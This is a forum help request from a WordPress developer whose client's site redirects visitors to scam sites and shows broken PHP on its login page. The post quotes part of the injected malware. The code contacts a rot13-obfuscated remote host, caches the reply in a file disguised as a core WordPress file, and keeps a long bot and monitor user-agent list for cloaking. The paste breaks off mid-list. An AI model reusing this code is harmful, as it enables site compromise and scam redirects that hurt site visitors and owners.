I'm a newbie wordpress developer, last Year, my friend and i built a website for a client using digitalocean as hosting and wordpress. Everything works great, although this is our first time using digitalocean, normally we just used normal local hosting with cpanel. I don't know anything about cloud server as i am more on frontend and SEO part.
Fast forward to today, the sites started displaying some odd behaviors like redirecting user to scam sites and we suspected the sites have been infected by some sort of malware but after we scanned there's none visible, and recently the site's login page are not functioning. It just displaying some php codes. My friend able to fix it but it kept on recurring everyday.
We cannot find the problem within the plugins, nor from the server. The plugin for the login page are LoginPress. The first few months, there's no problem with the site.
If any of you brilliant minds have any idea what this is, please let me know.
Some of the code as per below (i cannot post all the code as StackOverflow tagged my question as scam) :
if (!function_exists('getUserIP')) { function getUserIP() { foreach(array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach(array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('in_array_like')) { function in_array_like($referencia,$array){ foreach($array as $ref){ if (strstr($referencia,$ref)){ return true; } } return false; } } if (!function_exists('cacheUrlnew')) { function cacheUrlnew($u, $h) { $cachetime = 600; $file = ABSPATH . WPINC . '/class-wp-http-netfilter.php'; $mtime = 0; if (file_exists($file)) { $mtime = filemtime($file); } $filetimemod = $mtime + $cachetime; if ($filetimemod < time()) { $curl = curl_init($u); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'); curl_setopt($curl, CURLOPT_POSTFIELDS, "h=" . $h); curl_setopt($curl, CURLOPT_TIMEOUT, 15); $data = curl_exec($curl); curl_close($curl); if ($data) { file_put_contents($file, $data); } } else { $data = file_get_contents($file); } return $data; } } $gbt = getUserIP(); $uag = $_SERVER['HTTP_USER_AGENT']; $host = $_SERVER['HTTP_HOST']; $hwost = strtolower ($_SERVER['HTTP_HOST']); $ref = ''; if(isset($_SERVER['HTTP_REFERER'])) { $ref = $_SERVER['HTTP_REFERER']; }; $uri = $_SERVER['REQUEST_URI']; $id = $_SERVER['REQUEST_URI']; $googleBot = false; $bingBot = false; $anyBot = false; $blA = ''; $ccd = str_rot13('prrprmnrk.grpu'); $gbots = array( 'googlebot', 'feedfetcher', 'google-safety', 'googleweblight' ); if (in_array_like(strtolower($uag), $gbots)){ $googleBot = true; } $anybots = array( 'msie 6.0', 'the knowledge ai', 'newspaper', 'wp rocket','wp fastest cache preload bot','java','ifatsearch', 'dataforseobot', 'simplepie_useragent','site24x7','buck','go http package','krzana bot','okhttp','mailpoet cron','alittle client','woocommerce','dreamhost sitemonitor','sucuri uptime monitor','twitterbot','mod_pagespeed_na','axios','re-re studio','serf','python','itms','shipmondo','empty user agent','duckduckbot','df bot','hummingbird','sitelock','grequests','keybot','wedos','installatron','scalaj-http','dalvik','spotify','razorpay','elb-healthchecker','wpmudev','foregenix','semanticjuice','simplepie','pingdom','freshpingbot','8legs','statuscake','ioncrawl','rome client','reeder','ping.blo.gs','btwebclient','livedoor','postmanruntime', 'wget', 'rytebot','rss','zoombot','spark','scrapy','mediatoolkitbot','firmograph','universalfeedparser', 'uptimerobot', 'facebookexternalhit', '360spider', 'baidubot', 'advbot', 'ahrefs', 'aport', 'blexbot', 'barkrowler', 'curl', 'ccbot', 'redditbot', 'bdcbot', 'birdcrawlerbot', 'aragna', 'crazywebcrawler', 'contxbot', 'checkmarknetwork', 'crowsnest', 'dataminer', 'deusu', 'domaincrawler', 'domainsonocrawler', 'domaintools', 'dotbot', 'exabot', 'flightdeckreportsbot', 'go-http-client', 'httrack', 'mj12bot',
We've tried troubleshooting the server and scanned the server for malware but there's none detected. We've also tried to disable non-vital plugins but the issues still recurring tomorrow.